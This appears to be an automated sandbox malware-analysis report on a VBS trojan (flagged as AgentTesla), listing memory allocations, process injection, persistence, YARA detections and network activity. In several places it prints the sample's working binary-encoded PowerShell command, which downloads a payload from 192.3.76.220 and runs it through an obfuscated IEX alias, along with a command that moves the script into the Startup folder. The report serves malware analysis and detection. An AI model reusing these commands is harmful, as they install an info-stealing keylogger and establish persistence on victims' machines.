NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02947000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02948000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02949000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0294a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0294b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0294c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0294d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0294e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0294f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02951000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02952000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 3, 2022, 10:06 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02953000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

RegAsm.exe tried to sleep 445 seconds, actually delayed analysis time by 445 seconds

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\8ae16271-0e6b-4817-88a8-469fd467cc94\AgileDotNetRT.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110011,00101110,00110111,00110110,00101110,00110010,00110010,00110000,00101111,01100011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))\|P
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs'
cmdline	Powershell $t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110011,00101110,00110111,00110110,00101110,00110010,00110010,00110000,00101111,01100011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))\|P
cmdline	Powershell Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs'

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\8ae16271-0e6b-4817-88a8-469fd467cc94\AgileDotNetRT.dll

Executes one or more WMI queries (1 event)

wmi	Select * from Win32_PingStatus where ((Address='google.com') And TimeToLive=80 And BufferSize=32)

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 3, 2022, 10:06 a.m.	show_type: 0 filepath_r: Powershell parameters: $t0='QE150'.replace('Q','I').replace('150','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110011,00101110,00110111,00110110,00101110,00110010,00110010,00110000,00101111,01100011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))\|P filepath: Powershell	1	1	0
ShellExecuteExW Aug. 3, 2022, 10:06 a.m.	show_type: 0 filepath_r: Powershell parameters: Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs' filepath: Powershell	1	1	0

File has been identified by 6 AntiVirus engines on VirusTotal as malicious (6 events)

MicroWorld-eScan	VB:Trojan.Valyria.6933
FireEye	VB:Trojan.Valyria.6933
Cyren	VBS/Agent.ANG.gen!Eldorado
BitDefender	VB:Trojan.Valyria.6933
NANO-Antivirus	Trojan.Script.Vbs-heuristic.druvzi
Ad-Aware	VB:Trojan.Valyria.6933

Moves the original executable to a new location (1 event)

Time & API	Arguments	Status	Return	Repeated
MoveFileWithProgressW Aug. 3, 2022, 10:06 a.m.	newfilepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs flags: 2 oldfilepath_r: C:\Users\test22\AppData\Local\Temp\edi.vbs newfilepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs oldfilepath: C:\Users\test22\AppData\Local\Temp\edi.vbs	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 3, 2022, 10:06 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (1 event)

Data received

V1V1,011VV0,01V0101,011VV0,01011V0,VV1101,VV1010,V1VV0,V1VV0,V1VV0,V1VV0,01110111,01101V0,01101V1,011011V,011V101,V101V0,V1V1V,011101V,0111V10,01110101,011V101,V101V1,01111011,VV1101,VV1010,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1V1V,01101V1,01V11V,0101V01,01VV11,V1VV0,V111101,V1VV0,V1V1V,011011V,011V110,01V1011,01V01V,01V0101,011011V,01V1010,V101110,0101V10,011V101,011VV1,011V1V,V101V0,V1V1V,01010101,01V11V,01111V0,01V1V0,011V101,011V011,01V11V,0111VV,01V11V,V1011V,V1VV0,V11VV,V1011V,V1VV0,V11V01,V11VV,V11V10,V1101V,V101V1,VV1101,VV1010,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,01101V1,011V110,V1VV0,V101V0,V1V1V,01101V1,01V11V,0101V01,01VV11,V1VV0,V101101,011011V,011V101,V1VV0,V11VV,V101V1,01111011,011V010,0111V10,011V101,011VV1,01101011,01111101,VV1101,VV1010,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1V1V,0111VV,01011V0,01010111,011VV1,011V010,011V010,01VV10,010101V,V101110,01010111,0111V10,01101V1,011101V,011V101,V101V0,V1V1V,01010101,01V11V,01111V0,01V1V0,011V101,011V011,01V11V,0111VV,01V11V,V1011V,V1VV0,V11VV,V1011V,V1VV0,V1V1V,01101V1,01V11V,0101V01,01VV11,V101V1,VV1101,VV1010,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,01111101,VV1101,VV1010,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,VV1101,VV1010,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,VV1101,VV1010,VV1V1,VV1V1,01011011,011V010,01111V1,011101V,011V101,01011011,01011101,01011101,V1VV0,V1V1V,011V010,01101111,01110101,011101V,V1VV0,V111101,V1VV0,V1V1V,0111VV,01011V0,01010111,011VV1,011V010,011V010,01VV10,010101V,V101110,010101V,01101111,01VV01,0111V10,0111V10,011VV1,01111V1,V101V0,V101V1,VV1101,VV1010,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,V1VV0,01010111,0111V10,01101V1,011101V,011V101,V101101,01V1111,01110101,011101V

Poweshell is sending data to a remote host (1 event)

Data sent

GET /client.jpg HTTP/1.1 Host: 192.3.76.220 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 3, 2022, 10:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Aug. 3, 2022, 10:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (37 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Run a KeyLogger	rule	KeyLogger
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	browser info stealer	rule	infoStealer_browser_Zero
description	File Downloader	rule	Network_Downloader
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Communicates with host for which no DNS query was performed (1 event)

host

192.3.76.220

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Aug. 3, 2022, 10:07 a.m.	process_identifier: 2592 region_size: 516096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000498	1	0	0

A potential heapspray has been detected. 79 megabytes was sprayed onto the heap of the powershell.exe process (1 event)

count

1270

name

heapspray

process

powershell.exe

total_mb

length

65536

protection

PAGE_READWRITE

Potential code injection by writing to the memory of another process (5 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $²¡-¢öÀCñöÀCñöÀCñB\²ñåÀCñB\°ñQÀCñB\±ñèÀCñÿ¸Çñ÷ÀCñh`ñôÀCñ[@ðìÀCñ[FðÌÀCñ[GðÔÀCñÿ¸ÐñáÀCñöÀBñÚÁCñCJð©ÀCñC¼ñ÷ÀCñCAð÷ÀCñRichöÀCñPELÆ¢æbà8èP@à¨¨ðP\|K 89`8ô@P¬.text78 `.rdataâqPr<@@.data$\Ð®@À.tls 0¼@À.gfids0@¾@@.rsrc\|KPLÂ@@.reloc89 :@B base_address: 0x00400000 process_identifier: 2592 process_handle: 0x00000498	1	1
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ lEpEjE..pÑFLæFLæFLæFLæFLæFLæFLæFLæFLæFtÑFPæFPæFPæFPæFPæFPæFPæFxÑFÿÿÿÿpEÒFÒFÒFÒFÒFxÑFðEpE¸ªEØÑFp×FCPSTPDT ÒFàÒFÿÿÿÿÿÿÿÿÿÿÿÿ ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZp×Fþÿÿÿþÿÿÿu0Ï!tåa¾e¸Â¢z»^ âÈ¨3 F(A¬F-+A¸FL(AtVE.?AVtype_info@@tVE.?AVbad_alloc@std@@tVE.?AVbad_array_new_length@std@@tVE.?AVlogic_error@std@@tVE.?AVlength_error@std@@tVE.?AVout_of_range@std@@tVE.?AV_Facet_base@std@@tVE.?AV_Locimp@locale@std@@tVE.?AVfacet@locale@std@@tVE.?AU_Crt_new_delete@std@@tVE.?AVcodecvt_base@std@@tVE.?AUctype_base@std@@tVE.?AV?$ctype@D@std@@tVE.?AV?$codecvt@DDU_Mbstatet@@@std@@tVE.?AVbad_exception@std@@tVE.HtVE.?AVfailure@ios_base@std@@tVE.?AVruntime_error@std@@tVE.?AVsystem_error@std@@tVE.?AVbad_cast@std@@tVE.?AV_System_error@std@@tVE.?AVexception@std@@ base_address: 0x0046d000 process_identifier: 2592 process_handle: 0x00000498	1	1
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: base_address: 0x00473000 process_identifier: 2592 process_handle: 0x00000498	1	1
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: Æ«> : > >ùµ>ª¸½igiêK¾K þÀíÀÀ!h!>>VbUB ~ÕÅÏ Ëw&ãã I^L&þq¬b,Ýàcæ³èGävVÙe D)3. b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` ¢§µ¶³´±²¯°¸ Y base_address: 0x00474000 process_identifier: 2592 process_handle: 0x00000498	1	1
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2592 process_handle: 0x00000498	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Aug. 3, 2022, 10:07 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $²¡-¢öÀCñöÀCñöÀCñB\²ñåÀCñB\°ñQÀCñB\±ñèÀCñÿ¸Çñ÷ÀCñh`ñôÀCñ[@ðìÀCñ[FðÌÀCñ[GðÔÀCñÿ¸ÐñáÀCñöÀBñÚÁCñCJð©ÀCñC¼ñ÷ÀCñCAð÷ÀCñRichöÀCñPELÆ¢æbà8èP@à¨¨ðP\|K 89`8ô@P¬.text78 `.rdataâqPr<@@.data$\Ð®@À.tls 0¼@À.gfids0@¾@@.rsrc\|KPLÂ@@.reloc89 :@B base_address: 0x00400000 process_identifier: 2592 process_handle: 0x00000498	1	1	0

Creates a windows hook that monitors keyboard input (keylogger) (1 event)

Time & API	Arguments	Status	Return	Repeated
